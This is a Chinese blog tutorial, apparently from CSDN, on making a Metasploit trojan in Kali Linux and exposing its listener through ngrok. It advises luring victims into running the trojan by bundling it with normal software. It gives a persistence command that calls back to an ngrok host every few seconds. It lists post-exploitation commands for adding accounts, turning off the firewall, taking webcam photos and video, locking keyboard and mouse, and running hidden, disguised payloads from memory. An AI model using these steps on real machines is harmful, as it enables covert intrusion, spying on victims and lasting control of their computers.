Kali Linux 木马 内网穿透 保姆级教学

前言:在我的文章最早第一篇就发布了,但是当时用的是国内的飞鸽内网穿透,现在不仅仅要实名认证,而且免费的也没有了,部署和修改也比较麻烦。在这里我再推荐一个更好用的内网穿透,上手简单,而且完全免费也相对比较稳定可靠,就是大名鼎鼎的 Ngrok

https://dashboard.ngrok.com/icon-default.png?t=N7T8https://dashboard.ngrok.com/

 任务一  注册账号,(QQ邮箱不行!,我的GitHub账号由qq邮箱注册都无法授权)

任务二  如果遇到了一点问题请科学上网 咳咳嗯力挺非常good 魔戒.net 

任务三 这里选择Linux的,再去下载

任务四 下载完以后,将压缩包放到kali里面,解压。会得到ngrok文件

tar -xvzf ngrok-v3-stable-linux-amd64.tgz 

任务五 配置文件 回到APT,会发现下面有 密钥,复制

任务六 配置 ,在kali里面输入进去,在执行的时候记得加上 "./",出现了下面这个就是成功了.

任务七  连接服务器,进行内网穿透,本地监听端口

任务八 生成msf木马(未免杀) ,注意自己端口和地址

任务九 利用msf,使用以下模块 ,我这里监听端口是2024,是因为我左上角设置2024!!!

任务十 在Windows运行(在现实中,你要诱导受害者点击,比如捆绑正常软件.....等)

任务十一  添加持久性木马(后渗透),当你再次使用模块监听时,会自动连接

run persistence -X -i 3 -r [公网服务器名称 0.tcp.jp.ngrok.io] -p [公网端口]
-X                 //开机自启动
-i                 //回连的时间间隔 (-i 3 代表每3秒钟连接我们一次)
-r                 //目标机器 IP 地址(攻击主机)
-p                 //监听反向连接端口号

 

任务十二 kali后渗透命令 

 

基础命令
shell         #进入目标机cmd shell
background    #将当前会话放置后台
sessions      #sessions -h 查看帮助
sessions -i <ID值>  #进入会话   -k  杀死会话
bgrun / run   #执行已有的模块,输入run后按两下tab,列出已有的脚本
info      #查看已有模块信息
getuid    #查看当前用户身份
getprivs  #查看当前用户具备的权限
getpid    #获取当前进程ID(PID)
sysinfo   #查看目标机系统信息
irb   #开启ruby终端
ps    #查看正在运行的进程    
kill <PID值> #杀死指定PID进程
idletime     #查看目标机闲置时间
reboot / shutdown    #重启/关机
 
cmd命令
whoami     #当前权限
quser      #当前在线的管理员
net user   #存在用户
net user 用户名 密码 /add            #添加用户和对应密码
net localgroup 用户组名 用户名 /add  #将指定用户添加到指定用户组
netstat -ano  #查询当前计算机中网络连接通信情况,LISTENING表示该端口处于监听状态;ESTABLISHED表示该端口处于工作(通信)状态
systeminfo     #查看当前计算机中的详细情况
tasklist /svc  #查看每个进程所对应的服务
taskkill /f /im 程序名称    #结束某个指定名称的程序
taskkill /f /PID ID        #结束某个指定PID的进程
tasklist | findstr "字符串" #查找输出结果中指定的内容
netsh adcfirewall set allprofiles state off  #关闭防火墙
logoff        #注销某个指定用户的ID
shutdown -r   #重启当前计算机

 

​​​​​​​webcam摄像头命令
webcam_list     #查看摄像头
webcam_snap     #通过摄像头拍照
webcam_stream   #通过摄像头开启视频
uictl开关键盘/鼠标
uictl [enable/disable] [keyboard/mouse/all]  #开启或禁止键盘/鼠标
uictl disable mouse     #禁用鼠标
uictl disable keyboard  #禁用键盘
execute执行文件
execute   #在目标机中执行文件
execute -H -i -f  cmd.exe   #创建新进程cmd.exe,-H不可见,-i交互
execute -H -m -d notepad.exe -f payload.exe -a "-o hack.txt"
  #-d 在目标主机执行时显示的进程名称(用以伪装)-m 直接从内存中执行
  #"-o hack.txt"是payload.exe的运行参数

 这几段是从别的文章复制过来的,有兴趣就去看

【kali-漏洞利用】(3.3)后渗透之Meterpreter(上):命令大全_kali的meterpreter查看摄像头命令-CSDN博客

 任务十三 收工

 

 

  • 5
    点赞
  • 11
    收藏
    觉得还不错? 一键收藏
  • 4
    评论
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值